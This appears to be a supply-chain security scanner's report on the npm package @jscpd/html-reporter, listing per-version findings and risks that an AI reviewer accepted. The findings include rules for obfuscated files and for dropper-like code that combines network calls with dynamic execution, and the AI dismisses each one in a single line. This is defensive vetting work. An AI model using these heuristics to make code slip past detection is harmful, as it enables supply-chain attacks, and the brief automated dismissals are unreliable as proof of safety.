@jscpd/html-reporter
html reporter for jscpd
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:html/js/app.6818c71b.js | AI (source-diff): This is a webpack-bundled Vue.js SPA for the HTML reporter UI. Minified/bundled JS is expected and documented in the package's prebuild script and files array. | ai | |
| source-diff | obfuscated-file:html/js/app.4a4d284c.js | AI (source-diff): This is a standard webpack-bundled Vue.js SPA for the jscpd HTML report UI. Minified bundles are expected for this HTML reporter package. | ai | |
| source-diff | net-exec-file:html/js/app.4a4d284c.js | AI (source-diff): Network calls and dynamic code in this file are Vue Router navigation and Vue template compiler patterns in a bundled SPA — not dropper/loader behavior. | ai | |
| source-diff | obfuscated-file:html/workbox-79ffe3e0.js | AI (source-diff): File is the well-known Workbox 6.5.3 service worker library (self-identifies in code). Minified form is expected for this PWA caching library. | ai | |
| dependencies | unvetted-dep:colors | AI (dependencies): colors is pinned to 1.4.0, the last stable version before the sabotage incident. This is a deliberate safe pin and appropriate for this package. | ai | |
| dependencies | unvetted-dep:pug | AI (dependencies): pug is a well-known templating engine; its use is appropriate and expected for an HTML reporter package. | ai | |
| source-diff | obfuscated-file:html/js/app.48740c4b.js | AI (source-diff): This is a webpack-bundled Vue.js frontend app for the HTML report output. Minified JS is expected and normal for this package's HTML reporter assets. | ai | |
| source-diff | source-size-tripled | AI (source-diff): Size increase is due to addition of pre-built Vue.js + Font Awesome frontend assets for the HTML report. Expected for this type of reporter package. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): new Function() usage is in Vue.js v2.6.11 template compiler code — a well-known pattern in this framework, not a security risk for this package. | ai | |
| source-diff | net-exec-file:html/js/chunk-vendors.d0e2967a.js | AI (source-diff): File is the standard Vue.js v2.6.11 vendor bundle (confirmed by copyright header in sample). Network+exec pattern is Vue's template compiler, not malware. | ai | |
| provenance | no-provenance | AI (provenance): jscpd packages are published without Sigstore provenance; this is consistent across the ecosystem and not a risk indicator for this package. | ai |
Versions (showing 22 of 22)
| Version | Deps | Published |
|---|---|---|
| 4.2.4 | 3 / 12 | |
| 4.2.3 | 3 / 12 | |
| 4.2.2 | 3 / 12 | |
| 4.2.1 | 3 / 12 | |
| 4.2.0 | 3 / 12 | |
| 4.1.1 | 3 / 12 | |
| 4.1.0 | 3 / 12 | |
| 4.0.5 | 3 / 12 | |
| 4.0.4 | 3 / 12 | |
| 4.0.3 | 3 / 12 | |
| 4.0.2 | 3 / 12 | |
| 4.0.1 | 3 / 12 | |
| 4.0.0 | 4 / 10 | |
| 3.5.8 | 4 / 4 | |
| 3.5.6 | 4 / 4 | |
| 3.5.3 | 2 / 2 | |
| 3.3.22 | 2 / 2 | |
| 3.3.20 | 2 / 2 | |
| 3.3.17 | 2 / 2 | |
| 3.3.15 | 3 / 2 | |
| 3.3.14 | 3 / 2 | |
| 3.3.11 | 0 / 0 |
v4.2.4
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.2.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.2.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.2.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.2.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.1.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.1.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.0.4
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.0.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v4.0.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v4.0.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v4.0.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v3.5.8
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.5.6
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.5.3
4 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.3.22
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.3.20
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.3.17
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.3.15
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.3.14
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v3.3.11
1 finding[Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.